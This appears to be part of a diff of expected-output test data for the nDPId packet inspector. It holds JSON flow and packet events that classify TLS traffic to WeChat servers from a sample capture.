-00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1492167400812,"flow_last_seen":1492167448100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":17075,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1492167401063,"flow_last_seen":1492167448091,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":12550,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1492167452759,"flow_last_seen":1492167467498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":32873,"flow_avg_l4_payload_len":608,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1492167453010,"flow_last_seen":1492167467495,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":8726,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1492167454457,"flow_last_seen":1492167470188,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4284,"flow_tot_l4_payload_len":60307,"flow_avg_l4_payload_len":701,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1492167454458,"flow_last_seen":1492167467494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":16177,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1492167454818,"flow_last_seen":1492167477932,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3993,"flow_tot_l4_payload_len":57290,"flow_avg_l4_payload_len":596,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167455528,"flow_last_seen":1492167467498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167452759,"flow_last_seen":1492167452759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167452759,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1492167452759,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167452759,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8XuFAAEAGtlvAqAFny82XotNTAbtWrkW6AAAAAKACchAjbQAAAgQFtAQCCAoAMRtbAAAAAAEDAwc="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":493,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167453010,"flow_last_seen":1492167453010,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167453010,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1492167453010,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167453010,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8DstAAEAGBnLAqAFny82XotNUAbuiFhVRAAAAAKACchAILgAAAgQFtAQCCAoAMRuaAAAAAAEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1492167453125,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167453125,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701NWIPBqVq5Fu6ASN8jLwAAAAgQFoAQCCApF0gWaADEbWwEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":495,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1492167453125,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167453125,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0XuJAAEAGtmLAqAFny82XotNTAbtWrkW7ViDwa4AQAOUxAAAAAQEICgAxG7dF0gWa"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167452759,"flow_last_seen":1492167453126,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167453126,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1492167453357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167453357,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG701Rfi5PhohYVUqASN8gDZQAAAgQFoAQCCApF0gXVADEbmgEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1492167453357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167453357,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0DsxAAEAGBnnAqAFny82XotNUAbuiFhVSX4uT4oAQAOVoqQAAAQEICgAxG\/FF0gXV"} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167452759,"flow_last_seen":1492167453494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167453494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167452759,"flow_last_seen":1492167453503,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167453503,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167453010,"flow_last_seen":1492167454373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454373,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167454457,"flow_last_seen":1492167454457,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167454457,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1492167454457,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454457,"pkt":"8IQvSpdgeJKcD6iOCABFAAA86XpAAEAGK8LAqAFny82XotNVAbue7PR+AAAAAKACchAqvwAAAgQFtAQCCAoAMR0EAAAAAAEDAwc="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167454458,"flow_last_seen":1492167454458,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167454458,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1492167454458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454458,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8cSZAAEAGpBbAqAFny82XotNWAbsdO2wiAAAAAKACchA0zAAAAgQFtAQCCAoAMR0EAAAAAAEDAwc="} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":521,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167453010,"flow_last_seen":1492167454734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167454734,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":523,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167453010,"flow_last_seen":1492167454734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167454734,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1492167454801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454801,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701bGHEoeHTtsI6ASN8gRwgAAAgQFoAQCCApF0gdIADEdBAEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1492167454802,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167454802,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0cSdAAEAGpB3AqAFny82XotNWAbsdO2wjxhxKH4AQAOV3BwAAAQEICgAxHVpF0gdI"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454458,"flow_last_seen":1492167454802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454802,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167454818,"flow_last_seen":1492167454818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167454818,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1492167454818,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454818,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8NuJAAEAG3lrAqAFny82XotNXAbvn9Cu8AAAAAKACchCqHQAAAgQFtAQCCAoAMR1eAAAAAAEDAwc="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1492167454836,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454836,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG701XgAvN\/nuz0f6ASN8ip9gAAAgQFoAQCCApFraHjADEdBAEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1492167454836,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167454836,"pkt":"8IQvSpdgeJKcD6iOCABFAAA06XtAAEAGK8nAqAFny82XotNVAbue7PR\/4ALzgIAQAOUPMwAAAQEICgAxHWNFraHj"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454457,"flow_last_seen":1492167454837,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454837,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":544,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454458,"flow_last_seen":1492167455179,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1492167455179,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1492167455179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167455179,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701d\/O17O5\/QrvaASN8geewAAAgQFoAQCCApFraI2ADEdXgEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1492167455179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167455179,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0NuNAAEAG3mHAqAFny82XotNXAbvn9Cu9fztez4AQAOWDvAAAAQEICgAxHbhFraI2"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454818,"flow_last_seen":1492167455180,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167455180,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 